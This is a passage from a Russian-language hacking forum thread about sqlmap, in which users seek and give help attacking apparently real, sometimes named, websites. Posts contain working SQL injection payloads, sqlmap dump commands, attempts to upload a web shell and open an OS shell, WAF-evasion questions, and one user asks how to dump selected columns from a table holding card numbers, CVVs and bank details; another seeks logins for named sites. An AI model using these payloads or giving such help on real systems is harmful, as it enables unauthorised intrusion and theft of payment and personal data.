Вход

Просмотр полной версии : Вопросы по SQLMap


Страницы : 1 [2] 3 4 5

t0ma5
29.09.2016, 14:42
BabaDook said:
↑ (https://antichat.live/posts/3996514/)
долго объяснять свою мысль, уже флуд будет


такая же фигня, забили

zagruzkaaa
29.09.2016, 23:22
t0ma5 said:
↑ (https://antichat.live/posts/3996494/)
сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды


ну я имел ввиду чтобы сканеры запускать для разных сайтов) например создать отдельный список сайтов для каждого сканера

sinfo
03.10.2016, 18:47
Ничего не могу понять.

[21:06:50] [INFO] testing if current user is DBA

[21:06:50] [INFO] fetching current user

[21:06:50] [INFO] resumed: root@localhost

current user is DBA: True


'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE"]


Пытаюсь залить шелл пишет


"[WARNING] unable to automatically parse any web server path [INFO] trying to upload the file stager on '/home/ste/public_htm l/admin-ste/' via LIMIT 'LINES TERMINATED BY' method [13:46:37] [WARNING] unable to upload the file stager on '/home/ste/public_ html/admin-ste/' [13:46:37] [INFO] trying to upload the file stager on '/windows-tools/active-dir ectory-manager/' via LIMIT 'LINES TERMINATED BY' method [13:46:39] [WARNING] unable to upload the file stager on '/windows-tools/active- directory-manager/' [13:46:39] [WARNING] HTTP error codes detected during run: 404 (Not Found) - 8 times"]

t0ma5
03.10.2016, 18:50
sinfo said:
↑ (https://antichat.live/posts/3997993/)
Ничего не могу понять.
[21:06:50] [INFO] testing if current user is DBA
[21:06:50] [INFO] fetching current user
[21:06:50] [INFO] resumed: root@localhost
current user is DBA: True
Пытаюсь залить шелл пишет


ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет

sinfo
03.10.2016, 18:56
t0ma5 said:
↑ (https://antichat.live/posts/3997997/)
ну рутовый юзер мускула ещё не рут в системе) может быть тупо прав на запись нет


А с этими правами я могу перезаписать пасс админа?

BabaDook
03.10.2016, 18:57
sinfo said:
↑ (https://antichat.live/posts/3998003/)
А с этими правами я могу перезаписать пасс админа?


Да. Откуда вы путь взяли? похоже что он не верный, вроде 13 ошибка говорит о том что папка недоступна для записи. Вообщем по логам понять ничего не могу.

С начало у вас

/home/ste/public_htm l/admin-ste/

Потом /windows-tools/active- directory-manager/

sinfo
03.10.2016, 19:02
BabaDook said:
↑ (https://antichat.live/posts/3998004/)
Потом /windows-tools/active- directory-manager/


Это уже сам мап такое пишет

sinfo
04.10.2016, 19:31
--crawl=2

masterdolicjakov
06.10.2016, 01:35
Доброго всем времени суток!

Парни, помогите решить одну проблемку...

В общем суть дела:

Есть сайт на ASP

Нашел мапом две скули.

Когда прошу чекнуть базу... Выползает огромный список баз в количестве около 120 штук. Хз что такое творится. Задавал пар. --current-db (user), показывало название базы и юзверя. Но вот колонки читать не хочет.

Чекаю так:

1. sqlmap.py -u site.com/site.aspx?s=104 --dbs --threads=10

2. sqlmap.py -u site.com/site.aspx?s=104 -D Base --columns --no-cast --threads=10

http://savepic.ru/11700338.png

http://i78.fastpic.ru/big/2016/1006/89/81886ceb228da5249d2022ca17962989.png

sinfo
06.10.2016, 10:03
sqlmap resumed the following injection point(s) from stored session:

---

Parameter: #1* (URI)

Type: error-based

Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)

Payload: http://vapenw.com:80/catalogsearch/result/?cat=-3835) OR 1 GROUP BY

CONCAT(0x716a7a7071,(SELECT (CASE WHEN (3882=3882) THEN 1 ELSE 0 END)),0x716a70

7871,FLOOR(RAND(0)*2)) HAVING MIN(0)#&product_finished=52&q=1&rating=2

---

[22:53:16] [INFO] testing MySQL

[22:53:16] [WARNING] reflective value(s) found and filtering out

[22:53:46] [WARNING] turning off pre-connect mechanism because of connection tim

e out(s)

[22:53:46] [CRITICAL] connection timed out to the target URL. sqlmap is going to

retry the request(s)

[22:55:16] [CRITICAL] connection timed out to the target URL

пробывал с проски результата нуль(

t0ma5
06.10.2016, 13:26
masterdolicjakov (https://antichat.live/members/290046/)

sinfo (https://antichat.live/members/290989/)

религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?

masterdolicjakov
06.10.2016, 13:29
t0ma5 said:
↑ (https://antichat.live/posts/3998909/)
masterdolicjakov (https://antichat.live/members/290046/)
sinfo (https://antichat.live/members/290989/)
религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?


Доброго вам дня!

Извините, можно поподробней?

sinfo
06.10.2016, 13:45
t0ma5 said:
↑ (https://antichat.live/posts/3998909/)
masterdolicjakov (https://antichat.live/members/290046/)
sinfo (https://antichat.live/members/290989/)
религия не позволяет включить дебаг в sqlmap и посмотреть какие запросы не работают?


[12:47:12] [INFO] testing MySQL

[12:47:12] [PAYLOAD] -8319

[12:47:21] [WARNING] reflective value(s) found and filtering out

[12:47:21] [DEBUG] searching for error chunk length...

[12:47:21] [PAYLOAD] -8315) OR 1 GROUP BY CONCAT(0x7170627071,(SELECT REPEAT(0x34,1024)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

[12:47:51] [WARNING] turning off pre-connect mechanism because of connection time out(s)

[12:47:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)

BabaDook
06.10.2016, 13:51
PHP:
http://vapenw.com:80/catalogsearch/result/?cat=-3835)+ and extractvalue(0x0a,concat(0x0a,(select database()))) +--+-&product_finished=52&q=1&rating=2

sinfo
06.10.2016, 17:20
BabaDook said:
↑ (https://antichat.live/posts/3998916/)

PHP:
http://vapenw.com:80/catalogsearch/result/?cat=-3835)+ and extractvalue(0x0a,concat(0x0a,(select database()))) +--+-&product_finished=52&q=1&rating=2



А как в мапе раскрутить?

BabaDook
06.10.2016, 17:27
sinfo said:
↑ (https://antichat.live/posts/3999000/)
А как в мапе раскрутить?


хз

androd
10.10.2016, 17:49
Помогите решить проблему.

У меня есть таблица

Table: order_master_admin

[55 columns]

+-------------------------+--------------+

| Column | Type |

+-------------------------+--------------+

| timestamp | varchar(100) |

| address_1 | varchar(255) |

| address_2 | varchar(255) |

| bank_acc_hold_name | varchar(50) |

| bank_acc_no | varchar(16) |

| bank_cheque_no | varchar(5) |

| bank_name | varchar(50) |

| bank_route_no | varchar(10) |

| cc_cust_name | varchar(50) |

| cce_month | varchar(2) |

| cce_year | varchar(4) |

| ccno | varchar(16) |

| city | varchar(255) |

| comment | blob |

| country | varchar(255) |

| cvv_no | varchar(3) |

| date_modified | datetime |

| dob | varchar(50) |

| email | varchar(100) |

| fingerprint | varchar(255) |

| first_name | varchar(50) |

| invoice_id | varchar(50) |

| ipaddress | varchar(50) |

| language_id | int(11) |

| last_name | varchar(50) |

| mobile | varchar(255) |

| notify | int(2) |

| notify_date | datetime |

| order_id | varchar(50) |

| order_status_id | varchar(100) |

| order_time | datetime |

| password | varchar(50) |

| payment_address_format | blob |

| payment_mode | varchar(50) |

| payment_status | varchar(50) |

| phone | varchar(255) |

| return_code | varchar(10) |

| return_message | varchar(50) |

| ship_amount | varchar(25) |

| ship_type | varchar(100) |

| shipping_address1 | varchar(50) |

| shipping_address2 | varchar(50) |

| shipping_address_format | blob |

| shipping_city | varchar(50) |

| shipping_country | varchar(50) |

| shipping_firstname | varchar(50) |

| shipping_lastname | varchar(50) |

| shipping_pin | varchar(50) |

| shipping_state | varchar(50) |

| state | varchar(255) |

| total_amount | varchar(100) |

| transaction_id | varchar(100) |

| userid | varchar(50) |

| userlevel | varchar(50) |

| zipcode | varchar(255) |

+-------------------------+--------------+

При дампе мне нужно сдампить только эти поля

| ship_amount | varchar(25) |

| ship_type | varchar(100) |

| shipping_address1 | varchar(50) |

| shipping_address2 | varchar(50) |

| shipping_address_format | blob |

| shipping_city | varchar(50) |

| shipping_country | varchar(50) |

| shipping_firstname | varchar(50) |

| shipping_lastname | varchar(50) |

| shipping_pin | varchar(50) |

| shipping_state | varchar(50) |

И нужно что бы дамп был не с начало в конец,а с конца в начало.

Тоесть там 100к строк,мне нужен дамп с 95К строки как это сделать?

t0ma5
10.10.2016, 18:07
androd said:
↑ (https://antichat.live/posts/4000394/)
Помогите решить проблему.
У меня есть таблица
Table: order_master_admin
[55 columns]
+-------------------------+--------------+
| Column | Type |
+-------------------------+--------------+
| timestamp | varchar(100) |
| address_1 | varchar(255) |
| address_2 | varchar(255) |
| bank_acc_hold_name | varchar(50) |
| bank_acc_no | varchar(16) |
| bank_cheque_no | varchar(5) |
| bank_name | varchar(50) |
| bank_route_no | varchar(10) |
| cc_cust_name | varchar(50) |
| cce_month | varchar(2) |
| cce_year | varchar(4) |
| ccno | varchar(16) |
| city | varchar(255) |
| comment | blob |
| country | varchar(255) |
| cvv_no | varchar(3) |
| date_modified | datetime |
| dob | varchar(50) |
| email | varchar(100) |
| fingerprint | varchar(255) |
| first_name | varchar(50) |
| invoice_id | varchar(50) |
| ipaddress | varchar(50) |
| language_id | int(11) |
| last_name | varchar(50) |
| mobile | varchar(255) |
| notify | int(2) |
| notify_date | datetime |
| order_id | varchar(50) |
| order_status_id | varchar(100) |
| order_time | datetime |
| password | varchar(50) |
| payment_address_format | blob |
| payment_mode | varchar(50) |
| payment_status | varchar(50) |
| phone | varchar(255) |
| return_code | varchar(10) |
| return_message | varchar(50) |
| ship_amount | varchar(25) |
| ship_type | varchar(100) |
| shipping_address1 | varchar(50) |
| shipping_address2 | varchar(50) |
| shipping_address_format | blob |
| shipping_city | varchar(50) |
| shipping_country | varchar(50) |
| shipping_firstname | varchar(50) |
| shipping_lastname | varchar(50) |
| shipping_pin | varchar(50) |
| shipping_state | varchar(50) |
| state | varchar(255) |
| total_amount | varchar(100) |
| transaction_id | varchar(100) |
| userid | varchar(50) |
| userlevel | varchar(50) |
| zipcode | varchar(255) |
+-------------------------+--------------+
При дампе мне нужно сдампить только эти поля
| ship_amount | varchar(25) |
| ship_type | varchar(100) |
| shipping_address1 | varchar(50) |
| shipping_address2 | varchar(50) |
| shipping_address_format | blob |
| shipping_city | varchar(50) |
| shipping_country | varchar(50) |
| shipping_firstname | varchar(50) |
| shipping_lastname | varchar(50) |
| shipping_pin | varchar(50) |
| shipping_state | varchar(50) |
И нужно что бы дамп был не с начало в конец,а с конца в начало.
Тоесть там 100к строк,мне нужен дамп с 95К строки как это сделать?


есть параметр where


Code:
python ../sqlmapproject-sqlmap-ad612bf/sqlmap.py --help | grep where
--where=DUMPWHERE Use WHERE condition while table dumping

берешь бубен и пляшеш)


Code:
-C COL DBMS database table column(s) to enumerate

это на тему колон

"Тоесть там 100к строк,мне нужен дамп с 95К строки как это сделать?" учить как работают лимиты в мускуле думаю никто не будет -_-

sinfo
10.10.2016, 20:30
Пробую слить в дампере,сливает но туго(.Мап выдает вот такое

[13:30:30] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows 8.1 or 2012 R2

web application technology: ASP.NET, Microsoft IIS 8.5, ASP

back-end DBMS: Microsoft SQL Server 2008

[13:30:30] [INFO] fetching columns for table 'Master' in d

atabase 'cation'

[13:30:30] [INFO] the SQL query used returns 54 entries

[13:30:30] [INFO] starting 10 threads

[13:30:31] [INFO] fetching entries for table 'tMaster' in d

atabase 'cation'

[13:30:31] [INFO] resumed:

[13:30:31] [INFO] fetching number of entries for table 'Master

ster' in database 'master'

[13:30:31] [INFO] retrieved:

[13:30:31] [WARNING] multi-threading is considered unsafe in time-based data ret

rieval. Going to switch it off automatically

[13:30:31] [WARNING] (case) time-based comparison requires larger statistical mo

del, please wait.............................. (done)

[13:30:36] [WARNING] it is very important to not stress the network connection d

uring usage of time-based payloads to prevent potential disruptions

[13:30:37] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

[13:30:37] [WARNING] unable to retrieve the number of entries for table 'Master' in database 'cation'

[13:30:37] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 38 times

Sensoft
11.10.2016, 19:28
Ребят какие команды у сшела на sqlmap

Как залить норм shell


Code:
[18:27:05] [INFO] fingerprinting the back-end DBMS operating system
[18:27:05] [INFO] the back-end DBMS operating system is Linux
[18:27:06] [INFO] testing if current user is DBA
[18:27:06] [INFO] fetching current user
[18:27:07] [WARNING] reflective value(s) found and filtering out
[18:27:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:27:07] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[18:27:09] [INFO] checking if UDF 'sys_eval' already exist
[18:27:10] [INFO] checking if UDF 'sys_exec' already exist
[18:27:11] [INFO] detecting back-end DBMS version from its banner
[18:27:11] [INFO] retrieving MySQL plugin directory absolute path
[18:27:12] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ' in 'where clause'
[18:27:12] [INFO] resumed: /usr/lib/mysql/plugin/
[18:27:39] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
[18:27:53] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[18:27:54] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] y
[18:27:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
[18:27:59] [INFO] creating UDF 'sys_exec' from the binary UDF file
[18:28:01] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[18:28:01] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>

ссылка на скриншот http://i78.fastpic.ru/big/2016/1011/51/95e59ecf6cd1aaa9d13c2654e755fd51.png

LeninDie
12.10.2016, 00:08
вроде как нашлась скуля

скриншот: http://ipic.su/img/img7/fs/kiss_16kb.1476215719.png

но когда пытаюсь крутить скульмапом то нифига не выходит. уже и полный запрос делал как в программе - через файл и командой -r. оригинальное значение mailid=7581, sqlmap.py -u "https://host/file.php?mailid=7581" --cookie="blablabla" -p mailid --dbms=mysql --level=5 --risk=3 --current-db - так ведь верно запрос составлен?! сервис mysql - висит на сервере. подскажите куда копать, может что делаю не так? во время проверки пишет что параметр возможно уязвим но в итоге false positive

sinfo
12.10.2016, 00:22
LeninDie said:
↑ (https://antichat.live/posts/4000913/)
вроде как нашлась скуля
скриншот:
http://ipic.su/img/img7/fs/kiss_16kb.1476215719.png
но когда пытаюсь крутить скульмапом то нифига не выходит. уже и полный запрос делал как в программе - через файл и командой -r. оригинальное значение mailid=7581, sqlmap.py -u "
https://host/file.php?mailid=7581
" --cookie="blablabla" -p mailid --dbms mysql --level=5 --risk=3 --current-db - так ведь верно запрос составлен?! сервис mysql - висит на сервере. подскажите куда копать, может что делаю не так? во время проверки пишет что параметр возможно уязвим но в итоге false positive


false positive - это нормально

Sensoft
12.10.2016, 00:23
LeninDie said:
↑ (https://antichat.live/posts/4000913/)
вроде как нашлась скуля
скриншот:
http://ipic.su/img/img7/fs/kiss_16kb.1476215719.png
но когда пытаюсь крутить скульмапом то нифига не выходит. уже и полный запрос делал как в программе - через файл и командой -r. оригинальное значение mailid=7581, sqlmap.py -u "
https://host/file.php?mailid=7581
" --cookie="blablabla" -p mailid --dbms mysql --level=5 --risk=3 --current-db - так ведь верно запрос составлен?! сервис mysql - висит на сервере. подскажите куда копать, может что делаю не так? во время проверки пишет что параметр возможно уязвим но в итоге false positive


--dbms ? может --dbs

sinfo
12.10.2016, 00:23
У меня вопрос,пытаюсь слить бд.Но в ней присутствуют слова на кирилице,и в дампе это выглядет вот так ???????.Что можно сделать?

--charset=windows-1251 не помогает(

Если hex то \xec\xe0\xf0\xea\xe5\xf2\xee\xeb\xee\xe3

passwd
14.10.2016, 18:03
Подскажите как проще всего раскрутить Stacked Queries?

---

Parameter: q (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries (comment)

Payload: q=123';WAITFOR DELAY '0:0:5'--&c=123

---

Базы вытаскивает очень долго. Быть может можно найти значение в базе, которое отображается на странице и сделать UPDATE этого значения добавив "", а затем и шелл залить? Каков вообще вектор раскрутки Stacked Queries если нет доступа к админке (к тому же current user is DBA: False)?

Metal0l
18.10.2016, 19:55
подскажите пожалуйста как раскрутить скулю такого типа: http://site.ru/search?search_id=activetopics+AND+1=1+--+ (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)

Получил ее путем скана сайта в ZAP. Что только не перепробовал и повышал risk, level. Заранее спасибо

t0ma5
20.10.2016, 12:11
Metal0l said:
↑ (https://antichat.live/posts/4003247/)
подскажите пожалуйста как раскрутить скулю такого типа:
http://site.ru/search?search_id=activetopics+AND+1=1+--+ (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)
Получил ее путем скана сайта в ZAP. Что только не перепробовал и повышал risk, level. Заранее спасибо


что конкретно не получается?

Metal0l
20.10.2016, 12:27
t0ma5 said:
↑ (https://antichat.live/posts/4003858/)
что конкретно не получается?


Не получается получить доступ к БД.

t0ma5
20.10.2016, 12:31
Metal0l said:
↑ (https://antichat.live/posts/4003871/)
Не получается получить доступ к БД.


это понятно, получилось бы - вы бы сюда не писали

http://site.ru/search?search_id=activetopics+AND+1=1+--+ (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)

http://site.ru/search?search_id=activetopics+AND+1=2+--+ (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)

информация на странице различается?

вообще слабо верится что тут есть инъекция, ибо не вижу внедрения в запрос, строковое значение всяко должно быть в каких либо кавычках/аппострофах, возможно просто синтаксис поиска поддерживает логические операторы и сканер просто ошибся

Metal0l
20.10.2016, 12:34
t0ma5 said:
↑ (https://antichat.live/posts/4003874/)
это понятно, получилось бы - вы бы сюда не писали
http://site.ru/search?search_id=activetopics+AND+1=1+--+

http://site.ru/search?search_id=activetopics+AND+1=2+--+ (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)
информация на странице различается?
вообще слабо верится что тут есть инъекция, ибо не вижу внедрения в запрос, строковое значение всяко должно быть в каких либо кавычках/аппострофах, возможно просто синтаксис поиска поддерживает логические операторы и сканер просто ошибся


Да, честно говоря тоже сетовал на ошибку сканера. Информация различается. У меня выводит сообщение о неопознанной ошибке, и просит обратиться к администратору сайта.

t0ma5
20.10.2016, 12:40
Metal0l said:
↑ (https://antichat.live/posts/4003875/)
Да, честно говоря тоже сетовал на ошибку сканера. Информация различается. У меня выводит сообщение о неопознанной ошибке, и просит обратиться к администратору сайта.


в теории конечно это может быть имя колонки или таблицы( хотя какой то форумный движок, странно было бы иметь такую багу )

http://site.ru/search?search_id=activetopics (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+),version()

http://site.ru/search?search_id=activetopics (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)+where+1=1+--+s

http://site.ru/search?search_id=activetopics (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)+where+1=2+--+s

Metal0l
20.10.2016, 12:43
t0ma5 said:
↑ (https://antichat.live/posts/4003883/)
в теории конечно это может быть имя колонки или таблицы( хотя какой то форумный движок, странно было бы иметь такую багу )
http://site.ru/search?search_id=activetopics (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)
,version()
http://site.ru/search?search_id=activetopics (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)
+where+1=1+--+s
http://site.ru/search?search_id=activetopics (http://site.ru/search?search_id=activetopics+AND+1%3D1+--+)
+where+1=2+--+s


Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"

t0ma5
20.10.2016, 12:57
Metal0l said:
↑ (https://antichat.live/posts/4003885/)
Возможно, но сам ZAP пишет, что все что идет после слов "activetopic"(в ссылке на скулю) - это способ "Атаки"


софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу

я это к тому что не надо верить софту на слово

Metal0l
20.10.2016, 13:18
t0ma5 said:
↑ (https://antichat.live/posts/4003898/)
софт много чего пишет, я недавно в винде 8 полез в настройки сети, вылезла ошибка, что то типа того "невозможно открыть настройки подключения из за ошибки компьютера" и кнопка "обновить компьютер", я так аху*л что ребутнулся в линуксы сразу
я это к тому что не надо верить софту на слово


Ахах, что ж ну восьмерка есть восьмерка. Большое спасибо за помощь, буду искать дальше.

brown
21.10.2016, 00:01
web application technology: Apache

back-end DBMS: MySQL >= 4.1

[22:03:31] [INFO] fetching columns for table 'cust' in database 'medical-special

ists-n'

[22:03:31] [INFO] the SQL query used returns 36 entries

[22:03:31] [DEBUG] suppressing possible resume console info because of large num

ber of rows. It might take too long

[22:03:31] [INFO] starting 10 threads

[22:03:31] [DEBUG] performed 0 queries in 0.23 seconds

[22:03:31] [INFO] fetching entries for table 'cust' in database 'medical-special

ists-n'

[22:03:31] [PAYLOAD] ' OR ROW(9489,9175)>(SELECT COUNT(*),CONCAT(0x716b706271,(S

ELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM `medical-specialists-n`.cust),0x7

176786b71,FLOOR(RAND(0)*2))x FROM (SELECT 2961 UNION SELECT 8568 UNION SELECT 54

10 UNION SELECT 8661)a GROUP BY x)-- NCpp

[22:03:31] [WARNING] the SQL query provided does not return any output

[22:03:31] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

[22:03:31] [WARNING] unable to retrieve the entries for table 'cust' in database

Не могу сдампить пользователей,таблицы показывает,колонки тоже.А вот не дампит(((

masterdolicjakov
23.10.2016, 14:21
Привет всем!

Ребята, а можно как-то делитнуть базу через SQLmap?

brown
23.10.2016, 15:02
masterdolicjakov said:
↑ (https://antichat.live/posts/4004991/)
Привет всем!
Ребята, а можно как-то делитнуть базу через SQLmap?


--start=10 --stop=20

t0ma5
24.10.2016, 13:07
masterdolicjakov said:
↑ (https://antichat.live/posts/4005128/)
Спасибо, попробую.


делитнуть ведь от слова delete? если да, то start/stop тут не причет, это лимиты для запроса

для удаления записей базы у mysql юзера должны быть соответствующие права, + если select и delete в одном запросе всё равно делать нельзя, это если скуль в select

Bobrenz
29.10.2016, 04:04
всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?

BabaDook
29.10.2016, 16:06
Bobrenz said:
↑ (https://antichat.live/posts/4007073/)
всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?


мануал читать

t0ma5
31.10.2016, 15:55
Bobrenz said:
↑ (https://antichat.live/posts/4007073/)
всем привет, есть вопрос по мапу, софт получает название базы, но когда дело доходит до названия таблиц и столбцов, начинается брутфорс по словарям, НО вот тут и затык, я знаю название таблиц и столбцов из это базы (сливалась ранее) а теперь просто добавил названия в соответствующие словари мапа, но софт по какой - то причине не хочет есть эти названия и тупо говорит что ничего не нашел, как тут быть?


доступ к information_schema видимо нет, вот он и брутит

если ты знаешь названия таблиц/столбцов, то нах вообще брутить?

python sqlmap.py .... -D database -T table -C id,login,pass --dump

mezik87
31.10.2016, 16:42
Всем привет, ребят столкнулся с проблемой, нужна помощь, в общем не дампит базы данных мой SqlMap, помогите в решении проблемы, мой скайп: diman_13_133

.SpoilerTarget" type="button">Spoiler: Скриншот
http://image.prntscr.com/image/1d6e65553120436984539bb2126dfe42.png

mezik87
31.10.2016, 16:47
BabaDook said:
↑ (https://antichat.live/posts/4007905/)
Такая ошибка возникает из за системы слежение, или системе предотвращение нападение , особенность реализации роскомнадзора


Так не один сайт не дампиться, один раз мне каким то чудом удалось сдампить оттуда базы, и все, опять не дампиться

mezik87
31.10.2016, 16:51
BabaDook said:
↑ (https://antichat.live/posts/4007909/)
Ну ждите гостей. Вот вы посмотрите на факры, русском надзор, 1 раз получили дапм,больше не можете, роскомнадзор , вас не настораживает?


Нет не настораживает, мне нужно решить мою проблему, вопрос почему не дампится не один сайт, и как это исправить

mezik87
31.10.2016, 17:21
Так мне дельного совета никто и не дал, BabaDook не флуди пожалуйста, ребят кто помочь может в моей проблеме отпишите в ЛС или скайп

Bobrenz
02.11.2016, 02:12
t0ma5 said:
↑ (https://antichat.live/posts/4007889/)
доступ к information_schema видимо нет, вот он и брутит
если ты знаешь названия таблиц/столбцов, то нах вообще брутить?
python sqlmap.py .... -D database -T table -C id,login,pass --dump


потому что вот такая вот ботва теперь если использовать известные имена таблиц и столбцов

http://prntscr.com/d1w125

Bobrenz
10.11.2016, 11:04
народ, всем привет, вопрос такого плана, мап раскрутил уязвиомость, но при попытке запроса бд, сваливается в таймаут или запрос проксей

http://prntscr.com/d5eb4i

пытался и прокси использовать и тамаут ставил больше стандартного, не особо помогло. Есть еще варианты??

C@T
15.11.2016, 19:00
Допустим уязвимость была раскручена как: python sqlmap.py -r request.txt

(в request.txt уязвимые места были помечены *)

Как теперь заставить sqlmap при каждом запуске на домен, который был указан в request.txt работать через уже найденную скулю?

Т.е чтобы можно было указать python sqlmap.py -u domain.com --scheme.

Можно конечно продолжить запускать его с тем же request.txt, но если файл потерялся?

t0ma5
15.11.2016, 20:05
C@T said:
↑ (https://antichat.live/posts/4013478/)
Допустим уязвимость была раскручена как: python sqlmap.py -r request.txt
(в request.txt уязвимые места были помечены *)
Как теперь заставить sqlmap при каждом запуске на домен, который был указан в request.txt работать через уже найденную скулю?
Т.е чтобы можно было указать python sqlmap.py -u domain.com --scheme.
Можно конечно продолжить запускать его с тем же request.txt, но если файл потерялся?


пошарся в корне акка, вот тут


Code:
$ ls ~/.sqlmap/output/[цензура]/
dump files log session.sqlite target.txt

~/.sqlmap/output/[цензура]/log тут по идее параметры запроса есть

Bobrenz
18.11.2016, 10:50
в вапе для обхода waf есть команда tamper ну и соответствующий набор скриптов под это дело, но при попытке раскрути мапом базы я не замечал что конкретно фильтруется или на что стоит обратить внимание при использовании скриптов. Или данные вещи чисто на удачу, методом перебора?

3acuson
18.11.2016, 16:25
на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?

касается этой уязвимости http://www.securityfocus.com/bid/92687/info

крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может

t0ma5
19.11.2016, 18:05
3acuson said:
↑ (https://antichat.live/posts/4014536/)
на сервере стоит Hiawatha Webserver. Как обойти его WaF в мапе, какие тамперы можно задействовать?
касается этой уязвимости
http://www.securityfocus.com/bid/92687/info
крутит только MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause но таблицы выдернуть не может


надо узнать почему не может, доступ к information_schema есть? дебаг запросов юзал?

3acuson
19.11.2016, 20:45
дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.

пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))

возвращает ноль при запросе к счема.таблес

t0ma5
19.11.2016, 21:17
3acuson said:
↑ (https://antichat.live/posts/4014932/)
дебаг пишет [DEBUG] got HTTP error code: 441 (SQL Injection Detected) почти на все.
пропускает запросы типа 1 RLIKE (SELECT (CASE WHEN (9434=9434) THEN 1 ELSE 0x28 END))
возвращает ноль при запросе к счема.таблес


да похоже на waf, "441 (SQL Injection Detected) почти на все" почти на всё, но получается не на всё, возможно слово from его смущает, попробуй запрос отправить что то типа "select 1 from 1"

к information_schema вероятно поэтому же доступа нет

NiggaVlg34
22.11.2016, 19:37
Подскажите пожалуйста как узать команду --os-bof?

Я все делаю с телефона. Скачал себе metasploit framework через терминал GNURoot Debian как требовал sqlmap, но при выполнении запроса с командой --os-bof он все-равно требует наличие метасплоита. Как решить эту проблему? Или может надо сплоит закинуть в папку какую то?

И еще вопрос можно ли как то получить логины и пароли к ЛК на этом сайте samp-gf.ru?

Сдампил БД через эту узвимость http://samp-gf.ru/download.php?id=3' , но ничего толкового не нашел в таблицах.

И вот на этом сайте samp-rp.ru можно что нибудь сделать, я вроде ничего похожего на соль не нашел.

RWD
23.11.2016, 17:45
привет

как вот такое крутить в sqlmap

Request

GET /authenticate.php HTTP/1.1

Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

X-Requested-With: XMLHttpRequest

Host: wwwl.accuweather.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

HTTP/1.1 302 Found

Date: Wed, 23 Nov 2016 12:55:50 GMT

Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips PHP/5.4.16

X-Powered-By: PHP/5.4.16

Location: error.php?url=&mt=

Content-Length: 43

